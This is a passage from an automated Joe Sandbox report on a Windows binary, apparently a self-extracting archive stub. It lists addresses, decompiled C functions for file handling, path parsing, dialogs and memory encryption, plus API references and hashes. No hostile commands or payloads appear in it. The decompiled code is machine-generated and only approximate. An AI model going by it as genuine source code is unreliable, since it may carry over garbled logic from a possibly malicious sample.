                                                    0x00ceb3fb
                                                    0x00ceb3fe
                                                    0x00ceb3ff
                                                    0x00ceb420
                                                    0x00ceb420
                                                    0x00ceb422
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceb407
                                                    0x00ceb409
                                                    0x00ceb40b
                                                    0x00ceb40d
                                                    0x00ceb40f
                                                    0x00ceb411
                                                    0x00ceb413
                                                    0x00ceb41e
                                                    0x00000000
                                                    0x00ceb41e
                                                    0x00ceb413
                                                    0x00ceb40f
                                                    0x00000000
                                                    0x00ceb40b
                                                    0x00ceb424
                                                    0x00ceb426
                                                    0x00ceb429
                                                    0x00ceb442
                                                    0x00ceb442
                                                    0x00ceb444
                                                    0x00ceb447
                                                    0x00ceb457
                                                    0x00ceb459
                                                    0x00ceb459
                                                    0x00ceb449
                                                    0x00ceb449
                                                    0x00ceb44c
                                                    0x00000000
                                                    0x00ceb44e
                                                    0x00ceb44e
                                                    0x00ceb451
                                                    0x00000000
                                                    0x00ceb453
                                                    0x00ceb453
                                                    0x00ceb453
                                                    0x00ceb451
                                                    0x00ceb44c
                                                    0x00ceb467
                                                    0x00ceb46b
                                                    0x00ceb479
                                                    0x00ceb47e
                                                    0x00ceb493
                                                    0x00ceb495
                                                    0x00ceb49b
                                                    0x00ceb49e
                                                    0x00ceb4d0
                                                    0x00ceb4d0
                                                    0x00ceb4d5
                                                    0x00ceb4db
                                                    0x00ceb4db
                                                    0x00ceb4e2
                                                    0x00ceb4fc
                                                    0x00ceb4fc
                                                    0x00ceb4fd
                                                    0x00ceb503
                                                    0x00ceb509
                                                    0x00ceb50a
                                                    0x00ceb50b
                                                    0x00ceb510
                                                    0x00ceb513
                                                    0x00ceb515
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceb4e4
                                                    0x00ceb4e4
                                                    0x00ceb4ea
                                                    0x00ceb4ec
                                                    0x00000000
                                                    0x00ceb4ee
                                                    0x00ceb4ee
                                                    0x00ceb4f1
                                                    0x00000000
                                                    0x00ceb4f3
                                                    0x00ceb4f3
                                                    0x00ceb4fa
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceb4fa
                                                    0x00ceb4f1
                                                    0x00ceb4ec
                                                    0x00000000
                                                    0x00ceb517
                                                    0x00ceb51f
                                                    0x00ceb525
                                                    0x00ceb527
                                                    0x00ceb527
                                                    0x00ceb52f
                                                    0x00ceb534
                                                    0x00ceb53c
                                                    0x00ceb53f
                                                    0x00ceb541
                                                    0x00ceb555
                                                    0x00ceb55a
                                                    0x00ceb4a0
                                                    0x00ceb4a0
                                                    0x00ceb4a1
                                                    0x00ceb4a2
                                                    0x00ceb4a3
                                                    0x00ceb4a4
                                                    0x00ceb4ac
                                                    0x00ceb4ac
                                                    0x00ceb4ac
                                                    0x00ceb4ae
                                                    0x00ceb4b1
                                                    0x00ceb4b4
                                                    0x00ceb4b4
                                                    0x00ceb4ba
                                                    0x00ceb42b
                                                    0x00ceb42b
                                                    0x00ceb42e
                                                    0x00ceb430
                                                    0x00000000
                                                    0x00ceb432
                                                    0x00ceb432
                                                    0x00ceb435
                                                    0x00ceb436
                                                    0x00ceb437
                                                    0x00ceb438
                                                    0x00ceb43d
                                                    0x00ceb430
                                                    0x00ceb4bc
                                                    0x00ceb4bf
                                                    0x00ceb4c0
                                                    0x00ceb4c1
                                                    0x00ceb4c3
                                                    0x00ceb4cc
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceb39a
                                                    0x00ceb36e
                                                    0x00ceb370
                                                    0x00ceb3cc
                                                    0x00ceb3d0
                                                    0x00ceb3d0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceb305
                                                    0x00ceb308
                                                    0x00ceb30b
                                                    0x00ceb30e
                                                    0x00ceb311
                                                    0x00ceb314
                                                    0x00ceb317
                                                    0x00ceb317
                                                    0x00000000
                                                    0x00ceb2d4
                                                    0x00ceb2b6
                                                    0x00ceb2b6
                                                    0x00ceb322
                                                    0x00ceb324
                                                    0x00000000
                                                    0x00ceb329
                                                    0x00ceb1f8
                                                    0x00ceb1f8
                                                    0x00ceb1fb
                                                    0x00ceb204
                                                    0x00ceb207
                                                    0x00ceb20e
                                                    0x00ceb210
                                                    0x00ceb229
                                                    0x00ceb22a
                                                    0x00ceb22b
                                                    0x00ceb22d
                                                    0x00ceb232
                                                    0x00ceb212
                                                    0x00ceb212
                                                    0x00ceb215
                                                    0x00ceb216
                                                    0x00ceb218
                                                    0x00ceb21a
                                                    0x00ceb21c
                                                    0x00ceb221
                                                    0x00ceb221
                                                    0x00ceb235
                                                    0x00ceb237
                                                    0x00ceb239
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceb23f
                                                    0x00ceb242
                                                    0x00ceb244
                                                    0x00ceb246
                                                    0x00000000
                                                    0x00ceb248
                                                    0x00ceb248
                                                    0x00ceb24b
                                                    0x00000000
                                                    0x00ceb24b
                                                    0x00000000
                                                    0x00ceb246
                                                    0x00ceb32a
                                                    0x00ceb32d
                                                    0x00ceb332
                                                    0x00000000
                                                    0x00ceb335
                                                    0x00ceb1c8
                                                    0x00ceb1c8
                                                    0x00ceb1cf
                                                    0x00ceb1d0
                                                    0x00ceb1d2
                                                    0x00ceb1d7
                                                    0x00ceb336
                                                    0x00ceb33a
                                                    0x00ceb33a
                                                    0x00000000

                                                    APIs
                                                    • _free.LIBCMT ref: 00CEB324
                                                      • Part of subcall function 00CE9097: IsProcessorFeaturePresent.KERNEL32(00000017,00CE9086,00000000,00CE8D94,00000000,00000000,00000000,00000016,?,?,00CE9093,00000000,00000000,00000000,00000000,00000000), ref: 00CE9099
                                                      • Part of subcall function 00CE9097: GetCurrentProcess.KERNEL32(C0000417,00CE8D94,00000000,?,00000003,00CE9868), ref: 00CE90BB
                                                      • Part of subcall function 00CE9097: TerminateProcess.KERNEL32(00000000,?,00000003,00CE9868), ref: 00CE90C2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                    • String ID: *?$.
                                                    • API String ID: 2667617558-3972193922
                                                    • Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                                                    • Instruction ID: cc257a6439974cd86290317cb8f2dd9085f0f90b5fc542a2f2bce62bd0be310c
                                                    • Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                                                    • Instruction Fuzzy Hash: C551B371E0024AEFDF14DFAAC881ABEB7B5EF58310F244169E954E7350EB319E019B50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E00CC75DE(void* __ecx) {
				void* __esi;
				char _t55;
				signed int _t58;
				void* _t62;
				signed int _t63;
				signed int _t69;
				signed int _t86;
				void* _t91;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				E00CDEB78(0xcf27e9, _t108);
				E00CDEC50(0x60f8);
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E00CD0602(_t108 - 0x1014, _t106, 0x802);
					L4:
					_t82 =  *((intOrPtr*)(_t108 + 8));
					E00CC77DF(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x4094, 0x800);
					_t113 =  *((short*)(_t108 - 0x4094)) - 0x3a;
					if( *((short*)(_t108 - 0x4094)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E00CD05DA(__eflags, _t108 - 0x1014, _t108 - 0x4094, _t101);
							E00CC6EDB(_t108 - 0x3094);
							_push(0);
							_t55 = E00CCA56D(_t108 - 0x3094, __eflags, _t106, _t108 - 0x3094);
							_t86 =  *(_t108 - 0x208c);
							 *((char*)(_t108 - 0xd)) = _t55;
							__eflags = _t86 & 0x00000001;
							if((_t86 & 0x00000001) != 0) {
								__eflags = _t86 & 0xfffffffe;
								E00CCA4ED(_t106, _t86 & 0xfffffffe);
							}
							E00CC9556(_t108 - 0x204c);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t58 = E00CC9F1A(_t108 - 0x204c, __eflags, _t108 - 0x1014, 0x11);
							__eflags = _t58;
							if(_t58 != 0) {
								_push(0);
								_push(_t108 - 0x204c);
								_push(0);
								_t69 = E00CC3BBA(_t82);
								__eflags = _t69;
								if(_t69 != 0) {
									E00CC9620(_t108 - 0x204c);
								}
							}
							E00CC9556(_t108 - 0x50cc);
							__eflags =  *((char*)(_t108 - 0xd));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 - 0xd)) != 0) {
								_t63 = E00CC98E0(_t108 - 0x50cc, _t106, _t106, 5);
								__eflags = _t63;
								if(_t63 != 0) {
									SetFileTime( *(_t108 - 0x50c4), _t108 - 0x206c, _t108 - 0x2064, _t108 - 0x205c);
								}
							}
							E00CCA4ED(_t106,  *(_t108 - 0x208c));
							E00CC959A(_t108 - 0x50cc);
							_t91 = _t108 - 0x204c;
						} else {
							E00CC9556(_t108 - 0x6104);
							_push(1);
							_push(_t108 - 0x6104);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E00CC3BBA(_t82);
							_t91 = _t108 - 0x6104;
						}
						_t62 = E00CC959A(_t91);
					} else {
						E00CC2021(_t113, 0x53, _t82 + 0x32, _t106);
						_t62 = E00CC6D83(0xd01098, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t62;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E00CD0602(_t108 - 0x1014, 0xcf37a0, 0x802);
					E00CD05DA(_t112, _t108 - 0x1014, _t106, 0x802);
					goto L4;
				}
			}














                                                    0x00cc75e3
                                                    0x00cc75ed
                                                    0x00cc75f4
                                                    0x00cc75fd
                                                    0x00cc762c
                                                    0x00cc762c
                                                    0x00cc763a
                                                    0x00cc763f
                                                    0x00cc763f
                                                    0x00cc764f
                                                    0x00cc7654
                                                    0x00cc765c
                                                    0x00cc767b
                                                    0x00cc767f
                                                    0x00cc76bc
                                                    0x00cc76c7
                                                    0x00cc76d4
                                                    0x00cc76d7
                                                    0x00cc76dc
                                                    0x00cc76e2
                                                    0x00cc76e5
                                                    0x00cc76e8
                                                    0x00cc76ea
                                                    0x00cc76ef
                                                    0x00cc76ef
                                                    0x00cc76fa
                                                    0x00cc7707
                                                    0x00cc7715
                                                    0x00cc771a
                                                    0x00cc771c
                                                    0x00cc771e
                                                    0x00cc7727
                                                    0x00cc7728
                                                    0x00cc7729
                                                    0x00cc772e
                                                    0x00cc7730
                                                    0x00cc7738
                                                    0x00cc7738
                                                    0x00cc7730
                                                    0x00cc7743
                                                    0x00cc7748
                                                    0x00cc774c
                                                    0x00cc7750
                                                    0x00cc775b
                                                    0x00cc7760
                                                    0x00cc7762
                                                    0x00cc777f
                                                    0x00cc777f
                                                    0x00cc7762
                                                    0x00cc778c
                                                    0x00cc7797
                                                    0x00cc779c
                                                    0x00cc7681
                                                    0x00cc7687
                                                    0x00cc768c
                                                    0x00cc7696
                                                    0x00cc7697
                                                    0x00cc769a
                                                    0x00cc769d
                                                    0x00cc76a2
                                                    0x00cc76a2
                                                    0x00cc77a2
                                                    0x00cc765e
                                                    0x00cc7665
                                                    0x00cc7671
                                                    0x00cc7671
                                                    0x00cc77ad
                                                    0x00cc77b5
                                                    0x00cc77b5
                                                    0x00cc75ff
                                                    0x00cc7603
                                                    0x00000000
                                                    0x00cc7605
                                                    0x00cc7605
                                                    0x00cc7617
                                                    0x00cc7625
                                                    0x00000000
                                                    0x00cc7625

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC75E3
                                                      • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                      • Part of subcall function 00CCA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CCA598
                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC777F
                                                      • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA501
                                                      • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA532
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                    • String ID: :
                                                    • API String ID: 3226429890-336475711
                                                    • Opcode ID: 095fbd2c6699e147731f2a7796468cd8f49d6bb12f9d8cabd93d04ed73384edd
                                                    • Instruction ID: c638ec9dc1e7bee442f45cd3c7af10860d71cc1e18af2e116dc808a77c566db6
                                                    • Opcode Fuzzy Hash: 095fbd2c6699e147731f2a7796468cd8f49d6bb12f9d8cabd93d04ed73384edd
                                                    • Instruction Fuzzy Hash: 95416F71800158AAEB25EB64CD5AFEEB378EF45300F00819AF609A7192DB745F85DF71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 26%
                                                    			E00CDB48E(void* __ecx, void* __edx, void* __eflags, char _a3, char _a4, char _a7, char _a8, intOrPtr* _a8200) {
				void* __edi;
				void* __ebp;
				intOrPtr _t20;
				short* _t31;
				intOrPtr* _t33;
				signed int _t41;
				intOrPtr* _t42;
				void* _t44;

				E00CDEC50(0x2004);
				_push(0x80000);
				_t42 = E00CE3E33(__ecx);
				if(_t42 == 0) {
					E00CC6CA7(0xd01098);
				}
				_t33 = _a8200;
				 *_t42 = 0;
				_t41 = 0;
				while(1) {
					_push(0x1000);
					_push( &_a3);
					_push(0);
					_push(0);
					_push( &_a4);
					_push( *_t33);
					_t20 = E00CDB314(_t41, 0);
					 *_t33 = _t20;
					if(_t20 == 0) {
						break;
					}
					if( *_t42 != 0 || _a8 != 0x7b) {
						if(_a8 == 0x7d || E00CE3E13( &_a8) + _t41 > 0x3fffb) {
							break;
						} else {
							E00CE7686(_t42,  &_a8);
							_t41 = E00CE3E13(_t42);
							_t44 = _t44 + 0xc;
							if(_t41 == 0) {
								L11:
								if(_a7 == 0) {
									E00CE6066(_t42 + _t41 * 2, L"\r\n");
								}
								continue;
							}
							_t6 = _t41 - 1; // -1
							_t31 = _t42 + _t6 * 2;
							while( *_t31 == 0x20) {
								_t31 = _t31 - 2;
								_t41 = _t41 - 1;
								if(_t41 != 0) {
									continue;
								}
								goto L11;
							}
							goto L11;
						}
					} else {
						continue;
					}
				}
				return _t42;
			}











                                                    0x00cdb493
                                                    0x00cdb49c
                                                    0x00cdb4a6
                                                    0x00cdb4ab
                                                    0x00cdb4b2
                                                    0x00cdb4b2
                                                    0x00cdb4b7
                                                    0x00cdb4c2
                                                    0x00cdb4c5
                                                    0x00cdb537
                                                    0x00cdb537
                                                    0x00cdb540
                                                    0x00cdb541
                                                    0x00cdb542
                                                    0x00cdb547
                                                    0x00cdb548
                                                    0x00cdb54a
                                                    0x00cdb54f
                                                    0x00cdb553
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdb4cc
                                                    0x00cdb4dc
                                                    0x00000000
                                                    0x00cdb4f2
                                                    0x00cdb4f8
                                                    0x00cdb503
                                                    0x00cdb505
                                                    0x00cdb50a
                                                    0x00cdb520
                                                    0x00cdb525
                                                    0x00cdb530
                                                    0x00cdb536
                                                    0x00000000
                                                    0x00cdb525
                                                    0x00cdb50c
                                                    0x00cdb50f
                                                    0x00cdb512
                                                    0x00cdb518
                                                    0x00cdb51b
                                                    0x00cdb51e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdb51e
                                                    0x00000000
                                                    0x00cdb512
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdb4cc
                                                    0x00cdb565

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID: }
                                                    • API String ID: 176396367-4239843852
                                                    • Opcode ID: e91a140f377e248cfa273693019b1615bbfe44b74e51b5f4fc16efa5ac700dfe
                                                    • Instruction ID: df0fc782a0b8b11589a5078f27756ba98f7192f771efef5ce8a5a7891151139a
                                                    • Opcode Fuzzy Hash: e91a140f377e248cfa273693019b1615bbfe44b74e51b5f4fc16efa5ac700dfe
                                                    • Instruction Fuzzy Hash: BE21D17290434A9AD731EA64E845F6BB3ECDF91750F02042BF744C3341FB64AE4893A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00CCF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CCF2E4
                                                      • Part of subcall function 00CCF2C5: GetProcAddress.KERNEL32(00D081C8,CryptUnprotectMemory), ref: 00CCF2F4
                                                    • GetCurrentProcessId.KERNEL32(?,?,?,00CCF33E), ref: 00CCF3D2
                                                    Strings
                                                    • CryptUnprotectMemory failed, xrefs: 00CCF3CA
                                                    • CryptProtectMemory failed, xrefs: 00CCF389
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$CurrentProcess
                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                    • API String ID: 2190909847-396321323
                                                    • Opcode ID: 9d1424ed65a9287886031d2844d048ab17e6da6c2e4c280525131c4bed5597e6
                                                    • Instruction ID: 4b7cefbfa6cd8862c78db8bc376378448b77ab4cb029b99b7040708834df9d70
                                                    • Opcode Fuzzy Hash: 9d1424ed65a9287886031d2844d048ab17e6da6c2e4c280525131c4bed5597e6
                                                    • Instruction Fuzzy Hash: A3110331A007A9BBEF119B21DC45F6E3B56FF04720B08416EFC559B2A1DA709E0296A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E00CCB991(void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				short _t13;
				signed int _t14;
				short* _t19;
				signed int _t20;
				void* _t22;
				signed short* _t26;
				signed int _t28;
				signed int _t30;

				_t19 = _a8;
				_t26 = _a4;
				 *_t19 = 0;
				_t10 = E00CCBC98(__eflags, _t26);
				_t20 =  *_t26 & 0x0000ffff;
				if(_t10 != 0) {
					return E00CC4092(_t19, _a12, L"%c:\\", _t20);
				}
				_t28 = 0x5c;
				__eflags = _t20 - _t28;
				if(_t20 == _t28) {
					__eflags = _t26[1] - _t28;
					if(_t26[1] == _t28) {
						_push(_t28);
						_push( &(_t26[2]));
						_t10 = E00CE22C6(_t20);
						_pop(_t22);
						__eflags = _t10;
						if(_t10 != 0) {
							_push(_t28);
							_push(_t10 + 2);
							_t13 = E00CE22C6(_t22);
							__eflags = _t13;
							if(_t13 == 0) {
								_t14 = E00CE3E13(_t26);
							} else {
								_t14 = (_t13 - _t26 >> 1) + 1;
							}
							__eflags = _t14 - _a12;
							asm("sbb esi, esi");
							_t30 = _t28 & _t14;
							E00CE60C2(_t19, _t26, _t30);
							_t10 = 0;
							__eflags = 0;
							 *((short*)(_t19 + _t30 * 2)) = 0;
						}
					}
				}
				return _t10;
			}












                                                    0x00ccb992
                                                    0x00ccb999
                                                    0x00ccb99e
                                                    0x00ccb9a1
                                                    0x00ccb9a6
                                                    0x00ccb9ab
                                                    0x00000000
                                                    0x00ccb9bd
                                                    0x00ccb9c5
                                                    0x00ccb9c6
                                                    0x00ccb9c9
                                                    0x00ccb9cb
                                                    0x00ccb9cf
                                                    0x00ccb9d4
                                                    0x00ccb9d5
                                                    0x00ccb9d6
                                                    0x00ccb9dc
                                                    0x00ccb9dd
                                                    0x00ccb9df
                                                    0x00ccb9e4
                                                    0x00ccb9e5
                                                    0x00ccb9e6
                                                    0x00ccb9ed
                                                    0x00ccb9ef
                                                    0x00ccb9f9
                                                    0x00ccb9f1
                                                    0x00ccb9f5
                                                    0x00ccb9f5
                                                    0x00ccb9ff
                                                    0x00ccba03
                                                    0x00ccba05
                                                    0x00ccba0a
                                                    0x00ccba12
                                                    0x00ccba12
                                                    0x00ccba14
                                                    0x00ccba14
                                                    0x00ccb9df
                                                    0x00ccb9cf
                                                    0x00000000

                                                    APIs
                                                    • _swprintf.LIBCMT ref: 00CCB9B8
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: __vswprintf_c_l_swprintf
                                                    • String ID: %c:\
                                                    • API String ID: 1543624204-3142399695
                                                    • Opcode ID: 1f384847ff4158b2f6d5ef2529ced423239fa872b89054c302a5b1ee0b778420
                                                    • Instruction ID: 2d5fc86bec372f8e1035436abe26daaed0fdf2f36071d77ff3a511c646feda25
                                                    • Opcode Fuzzy Hash: 1f384847ff4158b2f6d5ef2529ced423239fa872b89054c302a5b1ee0b778420
                                                    • Instruction Fuzzy Hash: B501D263500351A99A346BA6CC87E6BA7ACEE91770F40841EF599D7082EB30DD4092B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E00CC1316(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E00CCE2C1(0xd01030, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E00CCE2E8(0xd01030, __edx, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0xd23154(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0xcf35f4);
								}
							}
						}
					}
				}
				return 0;
			}





                                                    0x00cc131d
                                                    0x00cc1380
                                                    0x00cc131f
                                                    0x00cc131f
                                                    0x00cc1326
                                                    0x00cc133c
                                                    0x00cc1345
                                                    0x00cc134a
                                                    0x00cc1352
                                                    0x00cc135a
                                                    0x00cc1362
                                                    0x00cc1370
                                                    0x00cc1370
                                                    0x00cc1362
                                                    0x00cc1352
                                                    0x00cc1345
                                                    0x00cc1326
                                                    0x00cc1388

                                                    APIs
                                                      • Part of subcall function 00CCE2E8: _swprintf.LIBCMT ref: 00CCE30E
                                                      • Part of subcall function 00CCE2E8: _strlen.LIBCMT ref: 00CCE32F
                                                      • Part of subcall function 00CCE2E8: SetDlgItemTextW.USER32(?,00CFE274,?), ref: 00CCE38F
                                                      • Part of subcall function 00CCE2E8: GetWindowRect.USER32(?,?), ref: 00CCE3C9
                                                      • Part of subcall function 00CCE2E8: GetClientRect.USER32(?,?), ref: 00CCE3D5
                                                    • GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                    • SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                    • String ID: 0
                                                    • API String ID: 2622349952-4108050209
                                                    • Opcode ID: 990c745072dca72b95a93738aaf295821ba32ff4f9284bcedaf9730c4244089e
                                                    • Instruction ID: 968b01009f00042b7a95640bf549a54c323b3d9b6307ea98a4ba58ea4b1fa4d0
                                                    • Opcode Fuzzy Hash: 990c745072dca72b95a93738aaf295821ba32ff4f9284bcedaf9730c4244089e
